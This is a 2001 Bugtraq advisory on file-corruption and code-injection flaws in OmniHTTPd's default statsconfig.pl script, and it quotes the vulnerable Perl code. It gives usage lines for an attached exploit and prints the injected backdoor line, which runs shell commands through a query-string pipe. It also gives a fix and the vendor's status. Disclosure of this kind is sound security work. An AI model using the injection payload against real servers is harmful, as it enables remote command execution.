Bugtraq mailing list archives
Vulnerabilities in OmniHTTPd default installation
From: joetesta () HUSHMAIL COM
Date: Mon, 15 Jan 2001 17:19:12 -0800
Vulnerabilities in OmniHTTPd default installation Overview Two vulnerabilities exist within the 'statsconfig.pl' script that comes with OmniHTTPd v2.07 and is installed by default. The first allows a remote attacker to corrupt any file in the system. The second allows arbitrary code to be inserted into '/cgi-bin/stats.pl'. Details Here is the offending code: if ($FORM{'mostbrowsers'}) { $mostbrowsers_str = '$most_browsers = "' . $FORM{'mostbrowsers'} . '";'; } ... unless (-f "$FORM{'cgidir'}/stats.prg") { $error .= "<LI>Config couldn't find the file stats.prg in your cgi-bin directory."; [ exit(); ] } ... $cgifile = "$FORM{'cgidir'}/stats.pl"; $progfile = "$FORM{'cgidir'}/stats.prg"; open(CGI, "> $cgifile"); open(PROG, "$progfile"); print CGI "#!/usr/local/bin/perl5\n"; print CGI "#AutoConfiged by Statsconfig.pl\n\n"; print CGI "$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n"; ... None of the variables in %FORM are filtered. An attacker simply sets $FORM{'cgidir'} to the absolute path of any file in the system (padded with a null, of course), and that file will be corrupted. Note that because absolute file names are used, this exploit is not restricted to the drive the webserver resides on. Code injection is achieved by setting $FORM{'mostbrowsers'} to any legal value, followed by a semicolon and the payload. Exploit I've written an exploit in PERL to demonstrate the two vulnerabilities. To corrupt a file: perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak The file you choose will be overwritten with approximately 470 bytes of PERL code. To inject code into '/cgi-bin/stats.pl': perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin You must pass the absolute path to the cgi-bin directory for this to work. This exploit is hard-coded to insert the following line: if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'} ); } With that done, point your browser to 'http://localhost/cgi-bin/stats.pl?|dir'. You will see a directory listing of '/cgi-bin'. Solution Erase 'statsconfig.pl' along with any other unnecessary files in your 'cgi-bin'. If this is not possible in your particular situation, replace your current 'statsconfig.pl' file with the attached 'statsconfig.fixed' file. This version allows 'statsconfig.pl' to be invoked only from localhost. Vendor Status Omnicron Technologies Corporation was notified via <info () omnicron ab ca> and <support () omnicron ab ca> on Monday, January 8, 2001. No reply was received. Free, encrypted, secure Web-based email at www.hushmail.com
Attachment:
2000.01.08.OmniHTTPd.zip
Description:
Current thread:
- Vulnerabilities in OmniHTTPd default installation joetesta (Jan 16)